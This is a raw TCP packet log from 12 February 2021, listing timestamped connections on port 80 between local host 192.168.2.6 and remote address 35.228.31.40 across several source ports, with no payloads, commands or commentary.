Feb 12, 2021 09:59:56.596925020 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.596949100 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.596960068 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.596988916 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.597007990 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.597028017 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.597040892 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.597068071 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.597136974 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.597155094 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.597197056 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.597266912 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.597649097 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.597707987 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.597726107 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.597749949 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.597793102 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.597805977 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.597814083 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.597856045 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.597896099 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.597922087 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.597929001 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.597961903 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.597970963 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.597995043 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.598026991 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.598086119 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.598138094 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.636820078 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.636878967 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.636918068 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.636945009 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.636957884 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.636997938 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.637001991 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.637031078 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.637062073 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.637092113 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.637115955 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.637125015 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.637147903 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.637187004 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.677906990 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.677963018 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.677999973 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678040981 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678040981 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678080082 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678097963 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678117990 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678128958 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678173065 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678210020 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678215981 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678246021 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678250074 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678289890 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678328991 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678340912 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678369999 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678378105 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678400993 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678421974 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678450108 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678451061 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678494930 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678495884 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678534031 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678574085 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678580046 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678611994 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678613901 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678652048 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678692102 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678705931 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678729057 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678735971 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678776979 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678821087 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678831100 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678858995 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678900003 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678903103 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678930044 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.678941011 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.678966045 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.681411982 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.681473970 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.681473970 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.681524038 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.681549072 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.681566954 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.681566954 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.681619883 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.681667089 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.683121920 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.683193922 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.718291044 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.718403101 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.719233990 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.719280005 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.719317913 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.719347954 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.719357014 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.719383001 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.719398022 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.719414949 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.719445944 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.719480991 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.719490051 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.719501972 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.719530106 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.719537020 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.719569921 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.719584942 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.719609022 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.719614983 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.719647884 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.719686985 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.719701052 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.719739914 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.722666979 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.722719908 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.722763062 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.722793102 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.722804070 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.722837925 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.722853899 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.722871065 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.722902060 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.724042892 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.724241972 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.760291100 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.760346889 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.760385036 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.760410070 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.760435104 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.760468006 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.760478973 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.760485888 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.760519028 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.760519981 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.760560036 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.760600090 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.760603905 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.760637045 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.760675907 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.760689020 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.760718107 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.760766029 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.760766029 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.760814905 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.761302948 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.762177944 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.762918949 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.762969017 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.762983084 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.763012886 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.763051987 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.763063908 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.763091087 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.763092041 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.763150930 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.764043093 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.764775038 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.765743971 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.765825033 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.801933050 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.801990986 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.802032948 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.802071095 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.802110910 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.802119017 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.802150965 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.802155972 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.802184105 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.802201033 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.802215099 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.802248001 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.802287102 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.802298069 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.802329063 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.802330971 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.802371025 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.802408934 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.802416086 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.802458048 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.802491903 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.803297997 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.803342104 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.803354979 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.803381920 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.803385973 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.803423882 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.803463936 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.803476095 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.803508043 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.803517103 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.803560972 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.803600073 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.803606987 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.803637981 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.803639889 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.803679943 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.803719044 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.803725958 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.803750038 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.803761959 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.803802013 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.857019901 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.937988997 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:57.129642010 CET	49743	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:57.222628117 CET	80	49743	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:57.223858118 CET	49743	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:57.452066898 CET	49743	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:57.533097029 CET	80	49743	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.401447058 CET	49754	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:40.401747942 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:40.480293036 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.480315924 CET	80	49754	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.480519056 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:40.480550051 CET	49754	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:40.483550072 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:40.606288910 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.928273916 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.928306103 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.928322077 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.928339005 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.928355932 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.928373098 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.928375006 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:40.928410053 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:40.928437948 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:40.968056917 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.968084097 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.968096018 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.968108892 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:40.968208075 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:40.969955921 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.006182909 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.006211996 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.006227970 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.006246090 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.006261110 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.006278992 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.006294966 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.006314039 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.006329060 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.006330013 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.006449938 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.007472038 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.007494926 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.007512093 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.007563114 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.007631063 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.045886040 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.045913935 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.046024084 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.046061039 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.047451973 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.047473907 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.047550917 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.047573090 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.048264980 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.048293114 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.048316002 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.048341036 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.048353910 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.048376083 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.048439026 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.085120916 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085146904 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085253000 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.085257053 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085277081 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085290909 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085294008 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.085334063 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085351944 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085367918 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.085369110 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085411072 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085427046 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.085429907 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085447073 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085464001 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085483074 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085500002 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085514069 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.085546970 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.085573912 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.085577965 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.085582018 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.088427067 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.088469982 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.088493109 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.088514090 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.088530064 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.088542938 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.088552952 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.088555098 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.088567972 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.088593006 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.088690996 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.090332985 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.090456009 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.126547098 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.126574993 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.126591921 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.126605988 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.126650095 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.126688004 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.127911091 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.127934933 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.127950907 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.127968073 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.128014088 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.128036022 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.128410101 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.128429890 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.128479004 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.128499031 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.129030943 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.129054070 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.129070044 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.129086971 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.129101038 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.129102945 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.129121065 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.129126072 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.129182100 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.165741920 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.165769100 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.165785074 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.165806055 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.165826082 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.165848017 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.165859938 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.165873051 CET	80	49755	35.228.31.40	192.168.2.6
